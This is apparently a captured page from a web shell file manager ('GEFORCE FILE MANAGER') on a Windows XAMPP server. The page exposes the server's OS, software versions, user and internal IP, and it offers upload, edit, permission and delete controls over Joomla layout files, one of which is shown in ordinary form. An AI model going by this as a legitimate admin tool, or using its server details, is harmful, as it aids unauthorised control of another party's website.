[ SYSTEM ]: Windows NT SWD-ELEARN-11 10.0 build 20348 (Windows Server 2016) AMD64
[ SERVER ]: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.3.9 | PHP: 7.3.9
[ USER ]: Elearn | IP: 10.201.204.156
GEFORCE FILE MANAGER
/
C:
/
xampp
/
htdocs
/
Ajaji
/
backup
/
alajaji
/
layouts
/
joomla
/
toolbar
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 base.php
360 B
SET
[ EDIT ]
|
[ DEL ]
📄 batch.php
769 B
SET
[ EDIT ]
|
[ DEL ]
📄 confirm.php
542 B
SET
[ EDIT ]
|
[ DEL ]
📄 containerclose.php
261 B
SET
[ EDIT ]
|
[ DEL ]
📄 help.php
517 B
SET
[ EDIT ]
|
[ DEL ]
📄 iconclass.php
295 B
SET
[ EDIT ]
|
[ DEL ]
📄 link.php
531 B
SET
[ EDIT ]
|
[ DEL ]
📄 modal.php
1,255 B
SET
[ EDIT ]
|
[ DEL ]
📄 popup.php
639 B
SET
[ EDIT ]
|
[ DEL ]
📄 separator.php
250 B
SET
[ EDIT ]
|
[ DEL ]
📄 slider.php
691 B
SET
[ EDIT ]
|
[ DEL ]
📄 standard.php
603 B
SET
[ EDIT ]
|
[ DEL ]
📄 title.php
495 B
SET
[ EDIT ]
|
[ DEL ]
📄 versions.php
905 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: versions.php
<?php /** * @package Joomla.Site * @subpackage Layout * * @copyright (C) 2013 Open Source Matters, Inc. <https://www.joomla.org> * @license GNU General Public License version 2 or later; see LICENSE.txt */ defined('_JEXEC') or die; JHtml::_('behavior.framework'); ?> <a rel="{handler: 'iframe', size: {x: <?php echo $displayData['height']; ?>, y: <?php echo $displayData['width']; ?>}}" href="index.php?option=com_contenthistory&view=history&layout=modal&tmpl=component&item_id=<?php echo (int) $displayData['itemId']; ?>&type_id=<?php echo $displayData['typeId']; ?>&type_alias=<?php echo $displayData['typeAlias']; ?>&<?php echo JSession::getFormToken(); ?>=1" title="<?php echo $displayData['title']; ?>" class="btn btn-small modal_jform_contenthistory"> <span class="icon-archive" aria-hidden="true"></span> <?php echo $displayData['title']; ?> </a>